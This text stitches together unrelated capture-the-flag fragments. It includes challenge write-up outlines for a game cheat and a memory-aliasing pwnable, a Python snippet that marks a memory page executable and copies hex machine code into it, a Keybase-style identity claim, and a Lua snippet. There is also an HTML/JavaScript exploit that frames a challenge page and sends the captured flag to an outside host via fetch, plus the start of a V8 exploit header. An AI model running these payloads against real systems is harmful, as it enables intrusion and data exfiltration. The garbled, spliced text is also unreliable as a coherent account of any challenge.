300 point
Web
Andrew Fasano
This challenge can be solved by exploiting the time change from EDT to EST that will happen on Nov 6.
This challenge required that you write cheats for a Minecraft clone to bypass a large wall.
There are tons of ways to solve this, but here was the main idea.
- There was a function on the client side that returned whether a player has certain privileges.
- Most of these were checked by the server as well, with the exception of fly and noclip (and speed walk to an extent).
  o Also note, I didn't modify the server to ignore these, Minetest servers just do ¯\_(ツ)_/¯
- You can patch this function to return true, and the client can then toggle these abilities.
However, the binary had extra anti-cheat built in
This challenge was a source-only pwnable based on an aliasing bug with -O2. Also, not all the source code was given.
Intended solution outline:
- In the source in assignVotes, a voter and a candidate can become aliased, and -O2 optimization causes an incorrect return value.
  o If the person is the same as the candidate, it sets the voteMessage to a constant string, which should change votesToGive as well, but the return is incorrect, so it instead returns the original votesToGive value.
  o Then, when going to print the error message, it instead tries to print the votes (if the value is > the address of main).
  o This will print whatever pointer is given, allowing memory to be leaked up to a null byte.
- Now, with an arbitrary read, we can dump the binary and reverse the missing code.
- We can also leak libc addresses and dump libc (or take it from some other challenge)
from timeit import timeit
from ctypes import *
'''
libc = CDLL('libc.so.6')
# make the first page at 0x400000 readable, writable and executable (PROT_READ|PROT_WRITE|PROT_EXEC = 7)
libc.mprotect(0x400000,0x1000,7)
# hex-encoded machine code that gets copied over the start of that page
s = "e810000000303132333435363738394142434445465b803f007437c6065c48ffc6c6067848ffc68a074825ff00000048c1e8044801d88a00880648ffc68a074883e00f4801d88a00880648ffc648ffc7ebc4c3".decode('hex')
#s = "\xc3"
libc.memcpy(0x400000, c_char_p(s),len(s))
I hereby claim:
To claim this, I am signing this object:
301345b6e7e96c9d37137fbcab602685178e922c81e5da545c7958d9cd3315e9
<iframe src="http://crackme.web.chal.csaw.io/" id="a"></iframe>
<script>
let i=0;
// handle messages posted back from the framed challenge page
window.addEventListener("message", function(event) {
  msg = event.data;
  console.log("attacker got ",msg);
  if (msg.id == 0) {
    // reply to the framed page with a 'run' request tagged by an incrementing id
    a.contentWindow.postMessage({type:'run', id: i++, from:'page'},'*');
  } else if (msg.id == 1) {
    fetch("http://itszn.com/?flag="+msg.output);
  }
});
</script>
-- TODO: move util functions to common.lua
local charts = {}
local passed = false
local desw = 770
local desh = 800
local moveX = 0
local moveY = 0
/* Plaid CTF 2018 v8 Exploit. Exploit begins around line 240 */
/* ### Utils, thanks saelo ### */
//
// Tiny module that provides big (64bit) integers.
//
// Copyright (c) 2016 Samuel Groß
//